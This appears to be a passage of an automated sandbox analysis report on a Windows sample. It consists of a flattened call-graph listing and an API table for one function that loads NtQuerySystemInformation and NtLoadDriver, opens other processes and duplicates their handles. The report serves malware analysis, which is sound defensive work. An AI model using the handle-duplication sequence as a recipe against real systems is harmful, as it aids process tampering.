38665->38666 38666->38582 38687 44db70 38667->38687 38671 40dbfd 38690 4447d9 38671->38690 38674 40dc34 wcscpy wcscpy 38716 40d6f5 38674->38716 38675 40dc1f wcscpy 38675->38674 38678 40d6f5 3 API calls 38679 40dc73 38678->38679 38680 40d6f5 3 API calls 38679->38680 38681 40dc89 38680->38681 38682 40d6f5 3 API calls 38681->38682 38683 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38682->38683 38722 40da80 38683->38722 38686->38664 38688 40dbb4 memset memset 38687->38688 38689 409bca GetModuleFileNameW 38688->38689 38689->38671 38692 4447f4 38690->38692 38691 40dc1b 38691->38674 38691->38675 38692->38691 38693 444807 ??2@YAPAXI 38692->38693 38694 44481f 38693->38694 38695 444873 _snwprintf 38694->38695 38696 4448ab wcscpy 38694->38696 38729 44474a 8 API calls 38695->38729 38698 4448bb 38696->38698 38730 44474a 8 API calls 38698->38730 38699 4448a7 38699->38696 38699->38698 38701 4448cd 38731 44474a 8 API calls 38701->38731 38703 4448e2 38732 44474a 8 API calls 38703->38732 38705 4448f7 38733 44474a 8 API calls 38705->38733 38707 44490c 38734 44474a 8 API calls 38707->38734 38709 444921 38735 44474a 8 API calls 38709->38735 38711 444936 38736 44474a 8 API calls 38711->38736 38713 44494b 38737 44474a 8 API calls 38713->38737 38715 444960 ??3@YAXPAX 38715->38691 38717 44db70 38716->38717 38718 40d702 memset GetPrivateProfileStringW 38717->38718 38719 40d752 38718->38719 38720 40d75c WritePrivateProfileStringW 38718->38720 38719->38720 38721 40d758 38719->38721 38720->38721 38721->38678 38723 44db70 38722->38723 38724 40da8d memset 38723->38724 38725 40daac LoadStringW 38724->38725 38726 40dac6 38725->38726 38726->38725 38728 40dade 38726->38728 38738 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38726->38738 38728->38510 38729->38699 38730->38701 38731->38703 38732->38705 38733->38707 38734->38709 38735->38711 38736->38713 38737->38715 38738->38726 38749 409b98 GetFileAttributesW 38739->38749 38741 40daea 38742 40db63 38741->38742 
38743 40daef wcscpy wcscpy GetPrivateProfileIntW 38741->38743 38742->38512 38750 40d65d GetPrivateProfileStringW 38743->38750 38745 40db3e 38751 40d65d GetPrivateProfileStringW 38745->38751 38747 40db4f 38752 40d65d GetPrivateProfileStringW 38747->38752 38749->38741 38750->38745 38751->38747 38752->38742 38789 40eaff 38753->38789 38757 411ae2 memset 38756->38757 38758 411b8f 38756->38758 38829 409bca GetModuleFileNameW 38757->38829 38770 411a8b 38758->38770 38760 411b0a wcsrchr 38761 411b22 wcscat 38760->38761 38762 411b1f 38760->38762 38830 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38761->38830 38762->38761 38764 411b67 38831 402afb 38764->38831 38768 411b7f 38887 40ea13 SendMessageW memset SendMessageW 38768->38887 38771 402afb 27 API calls 38770->38771 38772 411ac0 38771->38772 38773 4110dc 38772->38773 38774 41113e 38773->38774 38779 4110f0 38773->38779 38912 40969c LoadCursorW SetCursor 38774->38912 38776 411143 38913 444a54 38776->38913 38916 4032b4 38776->38916 38934 40b1ab ??3@YAXPAX ??3@YAXPAX 38776->38934 38777 4110f7 _wcsicmp 38777->38779 38778 411157 38780 40ada2 _wcsicmp 38778->38780 38779->38774 38779->38777 38935 410c46 10 API calls 38779->38935 38783 411167 38780->38783 38781 4111af 38783->38781 38784 4111a6 qsort 38783->38784 38784->38781 38788->38594 38790 40eb10 38789->38790 38802 40e8e0 38790->38802 38793 40eb6c memcpy memcpy 38794 40ebb7 38793->38794 38794->38793 38795 40ebf2 ??2@YAPAXI ??2@YAPAXI 38794->38795 38796 40d134 16 API calls 38794->38796 38797 40ec2e ??2@YAPAXI 38795->38797 38799 40ec65 38795->38799 38796->38794 38797->38799 38799->38799 38812 40ea7f 38799->38812 38801 402f49 38801->38594 38803 40e8f2 38802->38803 38804 40e8eb ??3@YAXPAX 38802->38804 38805 40e900 38803->38805 38806 40e8f9 ??3@YAXPAX 38803->38806 38804->38803 38807 40e911 38805->38807 38808 40e90a ??3@YAXPAX 38805->38808 38806->38805 38809 40e931 ??2@YAPAXI ??2@YAPAXI 38807->38809 38810 40e921 ??3@YAXPAX 38807->38810 38811 40e92a ??3@YAXPAX 38807->38811 
38808->38807 38809->38793 38810->38811 38811->38809 38813 40aa04 ??3@YAXPAX 38812->38813 38814 40ea88 38813->38814 38815 40aa04 ??3@YAXPAX 38814->38815 38816 40ea90 38815->38816 38817 40aa04 ??3@YAXPAX 38816->38817 38818 40ea98 38817->38818 38819 40aa04 ??3@YAXPAX 38818->38819 38820 40eaa0 38819->38820 38821 40a9ce 4 API calls 38820->38821 38822 40eab3 38821->38822 38823 40a9ce 4 API calls 38822->38823 38824 40eabd 38823->38824 38825 40a9ce 4 API calls 38824->38825 38826 40eac7 38825->38826 38827 40a9ce 4 API calls 38826->38827 38828 40ead1 38827->38828 38828->38801 38829->38760 38830->38764 38888 40b2cc 38831->38888 38833 402b0a 38834 40b2cc 27 API calls 38833->38834 38835 402b23 38834->38835 38836 40b2cc 27 API calls 38835->38836 38837 402b3a 38836->38837 38838 40b2cc 27 API calls 38837->38838 38839 402b54 38838->38839 38840 40b2cc 27 API calls 38839->38840 38841 402b6b 38840->38841 38842 40b2cc 27 API calls 38841->38842 38843 402b82 38842->38843 38844 40b2cc 27 API calls 38843->38844 38845 402b99 38844->38845 38846 40b2cc 27 API calls 38845->38846 38847 402bb0 38846->38847 38848 40b2cc 27 API calls 38847->38848 38849 402bc7 38848->38849 38850 40b2cc 27 API calls 38849->38850 38851 402bde 38850->38851 38852 40b2cc 27 API calls 38851->38852 38853 402bf5 38852->38853 38854 40b2cc 27 API calls 38853->38854 38855 402c0c 38854->38855 38856 40b2cc 27 API calls 38855->38856 38857 402c23 38856->38857 38858 40b2cc 27 API calls 38857->38858 38859 402c3a 38858->38859 38860 40b2cc 27 API calls 38859->38860 38861 402c51 38860->38861 38862 40b2cc 27 API calls 38861->38862 38863 402c68 38862->38863 38864 40b2cc 27 API calls 38863->38864 38865 402c7f 38864->38865 38866 40b2cc 27 API calls 38865->38866 38867 402c99 38866->38867 38868 40b2cc 27 API calls 38867->38868 38869 402cb3 38868->38869 38870 40b2cc 27 API calls 38869->38870 38871 402cd5 38870->38871 38872 40b2cc 27 API calls 38871->38872 38873 402cf0 38872->38873 38874 40b2cc 27 API calls 38873->38874 38875 402d0b 
__aulldvrm 38225->38230 38232 41628e 38225->38232 38226 4163ca 38227 416422 10 API calls 38226->38227 38227->38232 38228 416422 10 API calls 38228->38230 38229 416172 memset 38229->38230 38230->38226 38230->38228 38230->38229 38231 415cb9 10 API calls 38230->38231 38230->38232 38231->38230 38233 416520 38232->38233 38234 416527 38233->38234 38238 416574 38233->38238 38235 415700 10 API calls 38234->38235 38236 416544 38234->38236 38234->38238 38235->38236 38237 416561 memcpy 38236->38237 38236->38238 38237->38238 38238->38177 38238->38224 38269 41bc3b 38239->38269 38242 41edad 86 API calls 38243 41f1cb 38242->38243 38244 41f1f5 memcmp 38243->38244 38245 41f20e 38243->38245 38249 41f282 38243->38249 38244->38245 38246 41f21b memcmp 38245->38246 38245->38249 38247 41f326 38246->38247 38250 41f23d 38246->38250 38248 41ee6b 86 API calls 38247->38248 38247->38249 38248->38249 38249->38031 38250->38247 38251 41f28e memcmp 38250->38251 38293 41c8df 56 API calls 38250->38293 38251->38247 38252 41f2a9 38251->38252 38252->38247 38255 41f308 38252->38255 38256 41f2d8 38252->38256 38254 41f269 38254->38247 38257 41f287 38254->38257 38258 41f27a 38254->38258 38255->38247 38298 4446ce 11 API calls 38255->38298 38259 41ee6b 86 API calls 38256->38259 38257->38251 38260 41ee6b 86 API calls 38258->38260 38261 41f2e0 38259->38261 38260->38249 38294 41b1ca 38261->38294 38264->38031 38265->38031 38266->38031 38267->38025 38268->38026 38271 41bc54 38269->38271 38277 41be0b 38269->38277 38271->38277 38281 41bc8d 38271->38281 38282 41bd61 38271->38282 38299 41baf0 55 API calls 38271->38299 38273 41be45 38273->38242 38273->38249 38275 41be04 38306 41aee4 56 API calls 38275->38306 38277->38282 38307 41ae17 34 API calls 38277->38307 38278 41bd42 38278->38275 38279 41bdd8 memset 38278->38279 38280 41bdba 38278->38280 38278->38282 38283 41bde7 memcmp 38279->38283 38292 4175ed 6 API calls 38280->38292 38281->38278 38281->38282 38284 41bd18 38281->38284 38300 4151e3 38281->38300 38282->38273 
38308 41a25f memset 38282->38308 38283->38275 38286 41bdfd 38283->38286 38284->38278 38284->38282 38304 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38284->38304 38285 41bdcc 38285->38282 38285->38283 38305 41a1b0 memset 38286->38305 38292->38285 38293->38254 38295 41b1e4 38294->38295 38297 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38295->38297 38358 41a1b0 memset 38295->38358 38297->38249 38298->38247 38299->38281 38309 41837f 38300->38309 38303 444706 11 API calls 38303->38284 38304->38278 38305->38275 38306->38277 38307->38282 38308->38273 38310 4183c1 38309->38310 38311 4183ca 38309->38311 38356 418197 25 API calls 38310->38356 38314 4151f9 38311->38314 38330 418160 38311->38330 38314->38284 38314->38303 38315 4183e5 38315->38314 38339 41739b 38315->38339 38318 418444 CreateFileW 38320 418477 38318->38320 38319 41845f CreateFileA 38319->38320 38321 4184c2 memset 38320->38321 38322 41847e GetLastError ??3@YAXPAX 38320->38322 38342 418758 38321->38342 38323 4184b5 38322->38323 38324 418497 38322->38324 38357 444706 11 API calls 38323->38357 38326 41837f 49 API calls 38324->38326 38326->38314 38331 41739b GetVersionExW 38330->38331 38332 418165 38331->38332 38334 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38332->38334 38335 418178 38334->38335 38336 41817f 38335->38336 38337 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38335->38337 38336->38315 38338 418188 ??3@YAXPAX 38337->38338 38338->38315 38340 4173d6 38339->38340 38341 4173ad GetVersionExW 38339->38341 38340->38318 38340->38319 38341->38340 38343 418680 43 API calls 38342->38343 38344 418782 38343->38344 38345 418506 ??3@YAXPAX 38344->38345 38346 418160 11 API calls 38344->38346 38345->38314 38347 418799 38346->38347 38347->38345 38348 41739b GetVersionExW 38347->38348 38349 4187a7 38348->38349 38350 4187da 38349->38350 38351 4187ad GetDiskFreeSpaceW 38349->38351 38353 4187ec GetDiskFreeSpaceA 38350->38353 38355 4187e8 
38350->38355 38354 418800 ??3@YAXPAX 38351->38354 38353->38354 38354->38345 38355->38353 38356->38311 38357->38314 38358->38297 38395 424f07 38359->38395 38361 4251e4 38362 4251f7 38361->38362 38363 4251e8 38361->38363 38403 4250f8 38362->38403 38402 4446ea 11 API calls 38363->38402 38365 4251f2 38365->38042 38367 425209 38370 425249 38367->38370 38373 4250f8 127 API calls 38367->38373 38374 425287 38367->38374 38411 4384e9 135 API calls 38367->38411 38412 424f74 124 API calls 38367->38412 38368 415c7d 16 API calls 38368->38365 38370->38374 38413 424ff0 13 API calls 38370->38413 38373->38367 38374->38368 38375 425266 38375->38374 38414 415be9 memcpy 38375->38414 38377->38042 38378->38069 38379->38042 38380->38042 38381->38042 38382->38042 38383->38042 38384->38060 38385->38044 38387 4442eb 38386->38387 38390 444303 38386->38390 38467 41707a 11 API calls 38387->38467 38389 4442f2 38389->38390 38468 4446ea 11 API calls 38389->38468 38390->38050 38392 444300 38392->38050 38393->38058 38394->38068 38396 424f1f 38395->38396 38397 424f0c 38395->38397 38416 424eea 11 API calls 38396->38416 38415 416760 11 API calls 38397->38415 38400 424f18 38400->38361 38401 424f24 38401->38361 38402->38365 38404 425108 38403->38404 38410 42510d 38403->38410 38449 424f74 124 API calls 38404->38449 38407 42516e 38409 415c7d 16 API calls 38407->38409 38408 425115 38408->38367 38409->38408 38410->38408 38417 42569b 38410->38417 38411->38367 38412->38367 38413->38375 38414->38374 38415->38400 38416->38401 38418 4256f1 38417->38418 38445 4259c2 38417->38445 38424 4259da 38418->38424 38428 422aeb memset memcpy memcpy 38418->38428 38429 429a4d 38418->38429 38433 4260a1 38418->38433 38443 429ac1 38418->38443 38418->38445 38448 425a38 38418->38448 38450 4227f0 memset memcpy 38418->38450 38451 422b84 15 API calls 38418->38451 38452 422b5d memset memcpy memcpy 38418->38452 38453 422640 13 API calls 38418->38453 38455 4241fc 11 API calls 38418->38455 38456 42413a 90 API calls 38418->38456 38423 
4260dd 38461 424251 120 API calls 38423->38461 38460 416760 11 API calls 38424->38460 38428->38418 38430 429a66 38429->38430 38431 429a9b 38429->38431 38462 415c56 11 API calls 38430->38462 38435 429a96 38431->38435 38464 416760 11 API calls 38431->38464 38459 415c56 11 API calls 38433->38459 38465 424251 120 API calls 38435->38465 38438 429a7a 38463 416760 11 API calls 38438->38463 38444 425ad6 38443->38444 38466 415c56 11 API calls 38443->38466 38444->38407 38445->38444 38454 415c56 11 API calls 38445->38454 38448->38445 38457 422640 13 API calls 38448->38457 38458 4226e0 12 API calls 38448->38458 38449->38410 38450->38418 38451->38418 38452->38418 38453->38418 38454->38424 38455->38418 38456->38418 38457->38448 38458->38448 38459->38424 38460->38423 38461->38444 38462->38438 38463->38435 38464->38435 38465->38443 38466->38424 38467->38389 38468->38392 38469->38074 38470->37953 38471->37953 40360 4148b6 FindResourceW 40361 4148f9 40360->40361 40362 4148cf SizeofResource 40360->40362 40362->40361 40363 4148e0 LoadResource 40362->40363 40363->40361 40364 4148ee LockResource 40363->40364 40364->40361 40366 441b3f 40376 43a9f6 40366->40376 40368 441b61 40549 4386af memset 40368->40549 40370 44189a 40371 4418e2 40370->40371 40373 442bd4 40370->40373 40374 4418ea 40371->40374 40550 4414a9 12 API calls 40371->40550 40373->40374 40551 441409 memset 40373->40551 40377 43aa20 40376->40377 40378 43aadf 40376->40378 40377->40378 40379 43aa34 memset 40377->40379 40378->40368 40380 43aa56 40379->40380 40381 43aa4d 40379->40381 40552 43a6e7 40380->40552 40560 42c02e memset 40381->40560 40386 43aad3 40562 4169a7 11 API calls 40386->40562 40387 43aaae 40387->40378 40387->40386 40402 43aae5 40387->40402 40388 43ac18 40391 43ac47 40388->40391 40564 42bbd5 memcpy memcpy memcpy memset memcpy 40388->40564 40392 43aca8 40391->40392 40565 438eed 16 API calls 40391->40565 40396 43acd5 40392->40396 40567 4233ae 11 API calls 40392->40567 40395 43ac87 40566 4233c5 16 API calls 40395->40566 
40568 423426 11 API calls 40396->40568 40400 43ace1 40569 439811 164 API calls 40400->40569 40401 43a9f6 162 API calls 40401->40402 40402->40378 40402->40388 40402->40401 40563 439bbb 22 API calls 40402->40563 40404 43acfd 40409 43ad2c 40404->40409 40570 438eed 16 API calls 40404->40570 40406 43ad19 40571 4233c5 16 API calls 40406->40571 40408 43ad58 40572 44081d 164 API calls 40408->40572 40409->40408 40412 43add9 40409->40412 40576 423426 11 API calls 40412->40576 40413 43ae3a memset 40414 43ae73 40413->40414 40577 42e1c0 148 API calls 40414->40577 40415 43adab 40574 438c4e 164 API calls 40415->40574 40416 43ad6c 40416->40378 40416->40415 40573 42370b memset memcpy memset 40416->40573 40420 43adcc 40575 440f84 12 API calls 40420->40575 40421 43ae96 40578 42e1c0 148 API calls 40421->40578 40424 43aea8 40425 43aec1 40424->40425 40579 42e199 148 API calls 40424->40579 40426 43af00 40425->40426 40580 42e1c0 148 API calls 40425->40580 40426->40378 40430 43af1a 40426->40430 40431 43b3d9 40426->40431 40581 438eed 16 API calls 40430->40581 40436 43b3f6 40431->40436 40437 43b4c8 40431->40437 40432 43b60f 40432->40378 40640 4393a5 17 API calls 40432->40640 40435 43af2f 40582 4233c5 16 API calls 40435->40582 40622 432878 12 API calls 40436->40622 40441 43b4f2 40437->40441 40628 42bbd5 memcpy memcpy memcpy memset memcpy 40437->40628 40439 43af51 40583 423426 11 API calls 40439->40583 40629 43a76c 21 API calls 40441->40629 40443 43af7d 40584 423426 11 API calls 40443->40584 40447 43b529 40630 44081d 164 API calls 40447->40630 40448 43b462 40624 423330 11 API calls 40448->40624 40449 43af94 40585 423330 11 API calls 40449->40585 40453 43afca 40586 423330 11 API calls 40453->40586 40454 43b47e 40458 43b497 40454->40458 40625 42374a memcpy memset memcpy memcpy memcpy 40454->40625 40455 43b544 40459 43b55c 40455->40459 40631 42c02e memset 40455->40631 40456 43b428 40456->40448 40623 432b60 16 API calls 40456->40623 40626 4233ae 11 API calls 40458->40626 40632 43a87a 164 API calls 
40459->40632 40461 43afdb 40587 4233ae 11 API calls 40461->40587 40466 43b56c 40470 43b58a 40466->40470 40633 423330 11 API calls 40466->40633 40467 43b4b1 40627 423399 11 API calls 40467->40627 40469 43afee 40588 44081d 164 API calls 40469->40588 40634 440f84 12 API calls 40470->40634 40471 43b4c1 40636 42db80 164 API calls 40471->40636 40476 43b592 40635 43a82f 16 API calls 40476->40635 40479 43b5b4 40637 438c4e 164 API calls 40479->40637 40481 43b5cf 40638 42c02e memset 40481->40638 40483 43b005 40483->40378 40487 43b01f 40483->40487 40589 42d836 164 API calls 40483->40589 40484 43b1ef 40599 4233c5 16 API calls 40484->40599 40487->40484 40597 423330 11 API calls 40487->40597 40598 42d71d 164 API calls 40487->40598 40488 43b212 40600 423330 11 API calls 40488->40600 40490 43b087 40590 4233ae 11 API calls 40490->40590 40491 43add4 40491->40432 40639 438f86 16 API calls 40491->40639 40494 43b22a 40601 42ccb5 11 API calls 40494->40601 40497 43b23f 40602 4233ae 11 API calls 40497->40602 40498 43b10f 40593 423330 11 API calls 40498->40593 40500 43b257 40603 4233ae 11 API calls 40500->40603 40504 43b129 40594 4233ae 11 API calls 40504->40594 40505 43b26e 40604 4233ae 11 API calls 40505->40604 40508 43b09a 40508->40498 40591 42cc15 19 API calls 40508->40591 40592 4233ae 11 API calls 40508->40592 40509 43b282 40605 43a87a 164 API calls 40509->40605 40511 43b13c 40595 440f84 12 API calls 40511->40595 40513 43b29d 40606 423330 11 API calls 40513->40606 40516 43b15f 40596 4233ae 11 API calls 40516->40596 40517 43b2af 40518 43b2b8 40517->40518 40519 43b2ce 40517->40519 40607 4233ae 11 API calls 40518->40607 40608 440f84 12 API calls 40519->40608 40523 43b2c9 40610 4233ae 11 API calls 40523->40610 40524 43b2da 40609 42370b memset memcpy memset 40524->40609 40527 43b2f9 40611 423330 11 API calls 40527->40611 40529 43b30b 40612 423330 11 API calls 40529->40612 40531 43b325 40613 423399 11 API calls 40531->40613 40533 43b332 40614 4233ae 11 API calls 40533->40614 40535 43b354 
40615 423399 11 API calls 40535->40615 40537 43b364 40616 43a82f 16 API calls 40537->40616 40539 43b370 40617 42db80 164 API calls 40539->40617 40541 43b380 40618 438c4e 164 API calls 40541->40618 40543 43b39e 40619 423399 11 API calls 40543->40619 40545 43b3ae 40620 43a76c 21 API calls 40545->40620 40547 43b3c3 40621 423399 11 API calls 40547->40621 40549->40370 40550->40374 40551->40373 40553 43a6f5 40552->40553 40556 43a765 40552->40556 40553->40556 40641 42a115 40553->40641 40556->40378 40561 4397fd memset 40556->40561 40558 43a73d 40558->40556 40559 42a115 148 API calls 40558->40559 40559->40556 40560->40380 40561->40387 40562->40378 40563->40402 40564->40391 40565->40395 40566->40392 40567->40396 40568->40400 40569->40404 40570->40406 40571->40409 40572->40416 40573->40415 40574->40420 40575->40491 40576->40413 40577->40421 40578->40424 40579->40425 40580->40425 40581->40435 40582->40439 40583->40443 40584->40449 40585->40453 40586->40461 40587->40469 40588->40483 40589->40490 40590->40508 40591->40508 40592->40508 40593->40504 40594->40511 40595->40516 40596->40487 40597->40487 40598->40487 40599->40488 40600->40494 40601->40497 40602->40500 40603->40505 40604->40509 40605->40513 40606->40517 40607->40523 40608->40524 40609->40523 40610->40527 40611->40529 40612->40531 40613->40533 40614->40535 40615->40537 40616->40539 40617->40541 40618->40543 40619->40545 40620->40547 40621->40491 40622->40456 40623->40448 40624->40454 40625->40458 40626->40467 40627->40471 40628->40441 40629->40447 40630->40455 40631->40459 40632->40466 40633->40470 40634->40476 40635->40471 40636->40479 40637->40481 40638->40491 40639->40432 40640->40378 40642 42a175 40641->40642 40644 42a122 40641->40644 40642->40556 40647 42b13b 148 API calls 40642->40647 40644->40642 40645 42a115 148 API calls 40644->40645 40648 43a174 40644->40648 40672 42a0a8 148 API calls 40644->40672 40645->40644 40647->40558 40662 43a196 40648->40662 40663 43a19e 40648->40663 40649 43a306 40649->40662 40673 
4388c4 14 API calls 40649->40673 40651 42ff8c 140 API calls 40651->40663 40652 42a115 148 API calls 40652->40663 40653 415a91 memset 40653->40663 40654 43a642 40654->40662 40687 4169a7 11 API calls 40654->40687 40656 4165ff 11 API calls 40656->40663 40658 43a635 40686 42c02e memset 40658->40686 40662->40644 40663->40649 40663->40651 40663->40652 40663->40653 40663->40656 40663->40662 40681 439504 13 API calls 40663->40681 40682 4312d0 148 API calls 40663->40682 40683 42be4c memcpy memcpy memcpy memset memcpy 40663->40683 40684 43a121 11 API calls 40663->40684 40665 43a325 40665->40654 40665->40658 40665->40662 40666 4169a7 11 API calls 40665->40666 40667 42b5b5 memset memcpy 40665->40667 40668 42bf4c 14 API calls 40665->40668 40671 4165ff 11 API calls 40665->40671 40674 42b63e 40665->40674 40685 42bfcf memcpy 40665->40685 40666->40665 40667->40665 40668->40665 40671->40665 40672->40644 40673->40665 40688 42b4ec 40674->40688 40676 42b64c 40694 42b5e4 memset 40676->40694 40678 42b65e 40679 42b66d 40678->40679 40695 42b3c6 11 API calls 40678->40695 40679->40665 40681->40663 40682->40663 40683->40663 40684->40663 40685->40665 40686->40654 40687->40662 40689 42b4ff 40688->40689 40690 415a91 memset 40689->40690 40691 42b52c 40690->40691 40692 42b553 memcpy 40691->40692 40693 42b545 40691->40693 40692->40693 40693->40676 40694->40678 40695->40679 40717 41493c EnumResourceNamesW 37673 4287c1 37674 4287d2 37673->37674 37675 429ac1 37673->37675 37676 428818 37674->37676 37677 42881f 37674->37677 37698 425711 37674->37698 37687 425ad6 37675->37687 37743 415c56 11 API calls 37675->37743 37710 42013a 37676->37710 37738 420244 97 API calls 37677->37738 37682 4260dd 37737 424251 120 API calls 37682->37737 37684 4259da 37736 416760 11 API calls 37684->37736 37690 422aeb memset memcpy memcpy 37690->37698 37691 429a4d 37692 429a66 37691->37692 37696 429a9b 37691->37696 37739 415c56 11 API calls 37692->37739 37694 4260a1 37735 415c56 11 API calls 37694->37735 37697 429a96 
37696->37697 37741 416760 11 API calls 37696->37741 37742 424251 120 API calls 37697->37742 37698->37675 37698->37684 37698->37690 37698->37691 37698->37694 37706 4259c2 37698->37706 37709 425a38 37698->37709 37726 4227f0 memset memcpy 37698->37726 37727 422b84 15 API calls 37698->37727 37728 422b5d memset memcpy memcpy 37698->37728 37729 422640 13 API calls 37698->37729 37731 4241fc 11 API calls 37698->37731 37732 42413a 90 API calls 37698->37732 37701 429a7a 37740 416760 11 API calls 37701->37740 37706->37687 37730 415c56 11 API calls 37706->37730 37709->37706 37733 422640 13 API calls 37709->37733 37734 4226e0 12 API calls 37709->37734 37711 42014c 37710->37711 37714 420151 37710->37714 37753 41e466 97 API calls 37711->37753 37713 420162 37713->37698 37714->37713 37715 4201b3 37714->37715 37716 420229 37714->37716 37717 4201b8 37715->37717 37718 4201dc 37715->37718 37716->37713 37719 41fd5e 86 API calls 37716->37719 37744 41fbdb 37717->37744 37718->37713 37722 4201ff 37718->37722 37750 41fc4c 37718->37750 37719->37713 37722->37713 37725 42013a 97 API calls 37722->37725 37725->37713 37726->37698 37727->37698 37728->37698 37729->37698 37730->37684 37731->37698 37732->37698 37733->37709 37734->37709 37735->37684 37736->37682 37737->37687 37738->37698 37739->37701 37740->37697 37741->37697 37742->37675 37743->37684 37745 41fbf8 37744->37745 37748 41fbf1 37744->37748 37758 41ee26 37745->37758 37749 41fc39 37748->37749 37768 4446ce 11 API calls 37748->37768 37749->37713 37754 41fd5e 37749->37754 37751 41ee6b 86 API calls 37750->37751 37752 41fc5d 37751->37752 37752->37718 37753->37714 37756 41fd65 37754->37756 37755 41fdab 37755->37713 37756->37755 37757 41fbdb 86 API calls 37756->37757 37757->37756 37759 41ee41 37758->37759 37760 41ee32 37758->37760 37769 41edad 37759->37769 37772 4446ce 11 API calls 37760->37772 37763 41ee3c 37763->37748 37766 41ee58 37766->37763 37774 41ee6b 37766->37774 37768->37749 37778 41be52 37769->37778 37772->37763 37773 41eb85 11 API calls 
37773->37766 37775 41ee70 37774->37775 37776 41ee78 37774->37776 37831 41bf99 86 API calls 37775->37831 37776->37763 37779 41be6f 37778->37779 37780 41be5f 37778->37780 37786 41be8c 37779->37786 37810 418c63 memset memset 37779->37810 37809 4446ce 11 API calls 37780->37809 37783 41be69 37783->37763 37783->37773 37784 41bee7 37784->37783 37814 41a453 86 API calls 37784->37814 37786->37783 37786->37784 37787 41bf3a 37786->37787 37790 41bed1 37786->37790 37813 4446ce 11 API calls 37787->37813 37789 41bef0 37789->37784 37792 41bf01 37789->37792 37790->37789 37793 41bee2 37790->37793 37791 41bf24 memset 37791->37783 37792->37791 37794 41bf14 37792->37794 37811 418a6d memset memcpy memset 37792->37811 37799 41ac13 37793->37799 37812 41a223 memset memcpy memset 37794->37812 37798 41bf20 37798->37791 37800 41ac52 37799->37800 37801 41ac3f memset 37799->37801 37804 41ac6a 37800->37804 37815 41dc14 19 API calls 37800->37815 37802 41acd9 37801->37802 37802->37784 37806 41aca1 37804->37806 37816 41519d 37804->37816 37806->37802 37807 41acc0 memset 37806->37807 37808 41accd memcpy 37806->37808 37807->37802 37808->37802 37809->37783 37810->37786 37811->37794 37812->37798 37813->37784 37815->37804 37819 4175ed 37816->37819 37827 417570 SetFilePointer 37819->37827 37822 41760a ReadFile 37823 417637 37822->37823 37824 417627 GetLastError 37822->37824 37825 4151b3 37823->37825 37826 41763e memset 37823->37826 37824->37825 37825->37806 37826->37825 37828 4175b2 37827->37828 37829 41759c GetLastError 37827->37829 37828->37822 37828->37825 37829->37828 37830 4175a8 GetLastError 37829->37830 37830->37828 37831->37776 37832 417bc5 37834 417c61 37832->37834 37838 417bda 37832->37838 37833 417bf6 UnmapViewOfFile CloseHandle 37833->37833 37833->37838 37836 417c2c 37836->37838 37844 41851e 20 API calls 37836->37844 37838->37833 37838->37834 37838->37836 37839 4175b7 37838->37839 37840 4175d6 FindCloseChangeNotification 37839->37840 37841 4175c8 37840->37841 37842 4175df 37840->37842 
37841->37842 37843 4175ce Sleep 37841->37843 37842->37838 37843->37840 37844->37836 40351 4147f3 40354 414561 40351->40354 40353 414813 40355 41456d 40354->40355 40356 41457f GetPrivateProfileIntW 40354->40356 40359 4143f1 memset _itow WritePrivateProfileStringW 40355->40359 40356->40353 40358 41457a 40358->40353 40359->40358

                      Control-flow Graph (function 40dd85; executed/not-executed node listing not reproduced)
                      APIs
                      • memset.MSVCRT ref: 0040DDAD
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • _wcsicmp.MSVCRT ref: 0040DEB2
                      • _wcsicmp.MSVCRT ref: 0040DEC5
                      • _wcsicmp.MSVCRT ref: 0040DED8
                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                      • memset.MSVCRT ref: 0040DF5F
                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                      • _wcsicmp.MSVCRT ref: 0040DFB2
                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
